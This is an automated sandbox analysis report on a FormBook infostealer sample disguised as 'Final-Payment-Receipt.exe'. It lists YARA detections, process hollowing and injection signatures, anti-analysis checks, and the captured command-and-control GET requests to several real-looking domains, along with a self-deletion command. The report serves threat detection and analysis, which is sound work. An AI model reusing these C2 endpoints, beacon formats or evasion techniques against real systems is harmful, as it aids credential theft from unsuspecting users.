Loading ...

Play interactive tourEdit tour

Analysis Report Final-Payment-Receipt.exe

Overview

General Information

Sample Name:Final-Payment-Receipt.exe
Analysis ID:320833
MD5:8f5d29001a9f5d4f62b47af6442be5ab
SHA1:4838464ffe421aad7c9d73ba19420b7e9c2c427d
SHA256:8e01fb320ffa60c0157bfc9aa8c6de43a7802d7f408de907a0d6338ce25c239c
Tags:exe

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Final-Payment-Receipt.exe (PID: 1692 cmdline: 'C:\Users\user\Desktop\Final-Payment-Receipt.exe' MD5: 8F5D29001A9F5D4F62B47AF6442BE5AB)
    • Final-Payment-Receipt.exe (PID: 5764 cmdline: C:\Users\user\Desktop\Final-Payment-Receipt.exe MD5: 8F5D29001A9F5D4F62B47AF6442BE5AB)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 4732 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 5932 cmdline: /c del 'C:\Users\user\Desktop\Final-Payment-Receipt.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b337:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c33a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18419:$sqlite3step: 68 34 1C 7B E1
    • 0x1852c:$sqlite3step: 68 34 1C 7B E1
    • 0x18448:$sqlite3text: 68 38 2A 90 C5
    • 0x1856d:$sqlite3text: 68 38 2A 90 C5
    • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b337:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c33a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.Final-Payment-Receipt.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.Final-Payment-Receipt.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a537:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b53a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.Final-Payment-Receipt.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17619:$sqlite3step: 68 34 1C 7B E1
        • 0x1772c:$sqlite3step: 68 34 1C 7B E1
        • 0x17648:$sqlite3text: 68 38 2A 90 C5
        • 0x1776d:$sqlite3text: 68 38 2A 90 C5
        • 0x1765b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17783:$sqlite3blob: 68 53 D8 7F 8C
        1.2.Final-Payment-Receipt.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.Final-Payment-Receipt.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b337:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c33a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: Final-Payment-Receipt.exeReversingLabs: Detection: 34%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: Final-Payment-Receipt.exeJoe Sandbox ML: detected
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_055EBFA0
          Source: global trafficHTTP traffic detected: GET /71m/?Rzr0iD=xuMbXRqvcjTkPYem20N3vsgWyUob49TNzNry+QjPYNTyHJJexkEaphWMorU+NKluO0/a&ZL3=rVvxt090-21lhr HTTP/1.1Host: www.wacrox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /71m/?Rzr0iD=gir/TGf45q640hyvaYoOLmcQvbxfbyF+CK0IasCqTcsJdBCY+OvZ/ZhMnEHJcPXMDgdk&ZL3=rVvxt090-21lhr HTTP/1.1Host: www.trumpingitagain.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /71m/?Rzr0iD=rhJBnfA/e5RktQ98+ow2gk+rbfXq49mIcD+nNtl3IG/t9WffOOBTTAV63Ad5zEG8kC/4&ZL3=rVvxt090-21lhr HTTP/1.1Host: www.themindofafunnygirl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU
          Source: Joe Sandbox ViewASN Name: AUTOMATTICUS AUTOMATTICUS
          Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
          Source: global trafficHTTP traffic detected: GET /71m/?Rzr0iD=xuMbXRqvcjTkPYem20N3vsgWyUob49TNzNry+QjPYNTyHJJexkEaphWMorU+NKluO0/a&ZL3=rVvxt090-21lhr HTTP/1.1Host: www.wacrox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /71m/?Rzr0iD=gir/TGf45q640hyvaYoOLmcQvbxfbyF+CK0IasCqTcsJdBCY+OvZ/ZhMnEHJcPXMDgdk&ZL3=rVvxt090-21lhr HTTP/1.1Host: www.trumpingitagain.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /71m/?Rzr0iD=rhJBnfA/e5RktQ98+ow2gk+rbfXq49mIcD+nNtl3IG/t9WffOOBTTAV63Ad5zEG8kC/4&ZL3=rVvxt090-21lhr HTTP/1.1Host: www.themindofafunnygirl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: g.msn.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Nov 2020 21:20:27 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 327Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 37 31 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /71m/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232733869.00000000023B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: wlanext.exe, 00000003.00000002.492344982.00000000041AF000.00000004.00000001.sdmpString found in binary or memory: https://themindofafunnygirl.com/71m/?Rzr0iD=rhJBnfA/e5RktQ98

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Final-Payment-Receipt.exe
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419D70 NtCreateFile,1_2_00419D70
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419E20 NtReadFile,1_2_00419E20
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419EA0 NtClose,1_2_00419EA0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419F50 NtAllocateVirtualMemory,1_2_00419F50
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419DC2 NtCreateFile,1_2_00419DC2
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419E1F NtReadFile,1_2_00419E1F
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419F4C NtAllocateVirtualMemory,1_2_00419F4C
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_013F9910
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F99A0 NtCreateSection,LdrInitializeThunk,1_2_013F99A0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9860 NtQuerySystemInformation,LdrInitializeThunk,1_2_013F9860
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9840 NtDelayExecution,LdrInitializeThunk,1_2_013F9840
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F98F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_013F98F0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9A20 NtResumeThread,LdrInitializeThunk,1_2_013F9A20
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_013F9A00
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9A50 NtCreateFile,LdrInitializeThunk,1_2_013F9A50
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9540 NtReadFile,LdrInitializeThunk,1_2_013F9540
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F95D0 NtClose,LdrInitializeThunk,1_2_013F95D0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9710 NtQueryInformationToken,LdrInitializeThunk,1_2_013F9710
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F97A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_013F97A0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9780 NtMapViewOfSection,LdrInitializeThunk,1_2_013F9780
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_013F9660
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F96E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_013F96E0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9950 NtQueueApcThread,1_2_013F9950
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F99D0 NtCreateProcessEx,1_2_013F99D0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9820 NtEnumerateKey,1_2_013F9820
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013FB040 NtSuspendThread,1_2_013FB040
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F98A0 NtWriteVirtualMemory,1_2_013F98A0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9B00 NtSetValueKey,1_2_013F9B00
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013FA3B0 NtGetContextThread,1_2_013FA3B0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9A10 NtQuerySection,1_2_013F9A10
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9A80 NtOpenDirectoryObject,1_2_013F9A80
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013FAD30 NtSetContextThread,1_2_013FAD30
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9520 NtWaitForSingleObject,1_2_013F9520
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9560 NtWriteFile,1_2_013F9560
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F95F0 NtQueryInformationFile,1_2_013F95F0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9730 NtQueryVirtualMemory,1_2_013F9730
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013FA710 NtOpenProcessToken,1_2_013FA710
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013FA770 NtOpenThread,1_2_013FA770
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9770 NtSetInformationFile,1_2_013F9770
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9760 NtOpenProcess,1_2_013F9760
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9FE0 NtCreateMutant,1_2_013F9FE0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9610 NtEnumerateValueKey,1_2_013F9610
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9670 NtQueryInformationProcess,1_2_013F9670
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9650 NtQueryValueKey,1_2_013F9650
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F96D0 NtCreateKey,1_2_013F96D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759A50 NtCreateFile,LdrInitializeThunk,3_2_03759A50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_03759910
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037599A0 NtCreateSection,LdrInitializeThunk,3_2_037599A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759860 NtQuerySystemInformation,LdrInitializeThunk,3_2_03759860
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759840 NtDelayExecution,LdrInitializeThunk,3_2_03759840
